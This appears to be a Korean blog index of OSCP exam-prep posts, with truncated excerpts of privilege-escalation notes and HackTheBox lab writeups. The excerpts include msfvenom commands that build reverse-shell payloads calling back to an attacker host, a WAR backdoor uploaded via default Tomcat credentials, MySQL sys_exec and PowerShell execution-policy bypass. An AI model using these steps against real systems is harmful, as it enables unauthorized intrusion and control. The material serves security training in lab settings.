OSCP 97

Linux privsec 테크닉

리눅스 manual 테크닉https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_-_linux.html Kernel exploits-다른 쳅터 참고 Programs running as root>ps aux Mysql root로 실행중이고 디비 접속 가능하다면 쉘 실행가능select sys_exec('whoami');select sys_eval('whoami');+User Defined function Installed software- 설치되는 폴더가 넘 광범위함, 스크립트를 활용하거나 dpkg만....# Debiandpkg -l Weak/reused/plaintext passwords- DB가 저장된 웹소스, 설정파일 찾..

OSCP/시험대비 2020.09.29

Windows privsec 테크닉

https://medium.com/bugbountywriteup/privilege-escalation-in-windows-380bee3a2842 *주목해야할 권한 주체Authenticated UserNT AUTHORITY\INTERACTIVEBUILTIN\Users(로그인 사용자)Everyone 스크립트마다 누락된 사항이 있을 수 있기 때문에 여러개를 돌려봐야함, 수동으로 찾아보는 것도 추천된다. Sherlock (Deprecated) => Watsons 사용할 것https://github.com/rasta-mouse/Watson 커맨드창에서 파워 쉘 실행 옵션powershell -noprofile -nologo -ep bypass -file WindowsEnum.ps1 * RDP허용? O, 저장된 패스..

OSCP/시험대비 2020.09.28

[Windows] Access

Access- MS Access DB읽어오는 방법- tool설치하거나 칼리에 있는거 사용하거나- 파워쉘 막혔을떄 어떻게 할지, StoredCredentials root@kali:/HTB/Access# ftpftp> binaryftp> get backup.mdbftp> get "Access Control.zip" * wget을 사용해서 ftp 익명유저로 다운로드 가능함, 이방법이 ftp접근해서 get하는 것보다 편리함wget -m ftp://anonymos:anonymous@10.10.10.98wget -m --no-passive ftp://anonymos:anonymous@10.10.10.98 root@kali:/HTB/Access# file backup.mdbroot@kali:/HTB/Access# s..

OSCP/HackTheBox 2020.09.26

[Windows] Chatterbox

Chatterbox- Exploit POC 스크립트를 수정하는 법을 알아야함- 파워쉘 명령어에 익숙해야함 Achat.exe에 대한 exploit이 존재함=> 페이로드 poc가 cmd 실행으로 되어있어서 리버스 쉘 옵션으로 교체함그 외 배드캐릭터 옵션과 인코딩 등 다른 옵션들은 그대로 사용 msfvenom -a x86 platform windows -p windows/shell_reverse_tcplhost=... lport=... -e x86/unicode_mixed -b "\x00...." BufferRegister=EAX -f python 완성된 쉘코드를 파이썬 스크립트 상에서 교체 후 타겟 IP와 포트 확인 후 변경하여 Exploit +POC 분석에 대하여 1152 - len(Payload)이 코드..

OSCP/HackTheBox 2020.09.24

[Windows] Jerry

Jerry 배운점- 디폴트페이지 접근- msfvenom .war 타입 쉘 지원 1. tomcat 메니저 페이지 접근 후 디폴트 credential 입력 /manager/html 2. msfvenom으로 jsp/war 타입 리버스쉘 페이로드 생성하여 업로드msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.xx.xx LPORT=4449 -f war > backdoor.war 잘못된 점- msfvenom에서 war타입 리버스 쉘을 제공하는지 모르고 빙빙돌아감 1. 칼리에 존재하는 jsp 웹쉘 war파일을 올린 후 msfvenom으로 tcp리버스 쉘 생성하여 업로드 2. jsp웹쉘에 접근, 파워쉘로 venom 페이로드 다운로드 받았지만 exe파일 실행이 안되서 망함. 3..

OSCP/HackTheBox 2020.09.24

[Linux] SwagShop

SwagShop - 가혹하지만 꼭 풀어보아야하는 문제.- sudo에 대해 잘 이해하고 있는가?- Exploit 디버깅해서 스크립트 수정할 수 있는가?- 스크립트 파일에 대한 설명, 주석에 대해 이해하였는가?- Exploit-DB에 등록된 스크립트는 완벽하지 않다.오래전에 올라온 스크립트라 라이브러리의 EOL같은 문제로 실행이 안될 수 도 있고...실행중인 서비스가 제작자에 의해 커스터마이징되어 특히 경로 부분이 수정될 수 있다.따라서, 이런 부분을 수정해줘야 한다. 디버깅하는 훈련이 필요하다. WriteUphttps://initinfosec.com/writeups/htb/2020/02/01/swagshop-htb-writeup/ 이니셜 쉘 nmap 결과 80포트가 오픈 됨magento 프레임워크를 사용하..

OSCP/HackTheBox 2020.09.18

[Linux] Irked

Irked - 어렵지 않은 난이도, 좋은 문제라고 생각함.- 1차 시험떄 느꼈지만, 구글링이 필요한 문제를 낸다. 이런 유형의 문제는 시험에 나올 가능성이 높다고 본다.- 구글링 후 추가적인 Software를 설치하는 것을 예상하지 못하면 시험 때, 당황 할 수 있다. Nmap 22...80...111.. rpcbind6697.. ircs-u8067...56813..65534... Enumeration IRC 관련 포트가 열려 있다. 웹 서버에 접속하였을때도 이미지명에 irc가 포함되어 있다.rpc 관련 문제같아서 Enumeration 후 관련 포트 연결을 시도해 봤으나 모두 실패.NC로 접속하여도 핵심 단서를 얻을 수 없었다, 그런데 접근 실패 매세지가 발생하여 혹시 다른 방벙으로 접속이 가능한지 생각..

OSCP/HackTheBox 2020.09.16

[Linux] October

October- OSCP 범위를 벗어난 문제 1. October CMS- 버전에 해당하는 exploit 취약점 있는가?- admin 구글링, 브루트포스- 디폴트 패스워드 시도 2. 권한상승- Smash the Stack 버퍼오버플로우, NX/DEP,ASLR 보안 플래그가 존재함- 범위를 벗어나므로 진행 Xhttps://www.hackingdream.net/2019/08/hackthebox-october-walkthrough.html 기타 정리 1. passwd에 등록된 사용자와 동일한 계정의 해쉬가 존재하는가?WEB폴더 -> DB.php -> 데이터베이스 계정 정보-> mysql 접근 -> 유저hash 획득 -> 존더리퍼 -> 동일한 비밀번호로 SSH 또는 su 접근 시도 2. DB서버가 root사용자에..

OSCP/HackTheBox 2020.09.16

[Linux] Nineveh

HTBNineveh: 난이도 쌉쌉어려움 1. 웹퍼징할 때, common.txt에 없는 리스트 시도해봐야 함...2. HOST로 지정된 주소와 IP로 접근하는 방식에 차이가 있었음. vhost 지정때문에 접근이 안되기도함3. 히드라 사용할때 http,https 등 IP(host)주소에 프로토콜을 넣으면 안됨. (Https 브루트포스 지원함, 비밀번호만 공격시 아이디는 아무값 넣어주면됨)4. searchsploit에 취약점이 나오지만 보안약점이 수정된 래빗홀(phpliteadmin) 일 수 있다. - 여러번 해봐도 잘 안된다면 다른 방법과 길이 없는지 생각해봐야 함 - 또한 특정 행위, 예를 들어 업로드까지 가능하다면 다른 취약점 백터와 연계될 수 있음을 생각해봐야한다. - 파일 업로드가 되고 경로까지 알 ..

OSCP/HackTheBox 2020.09.14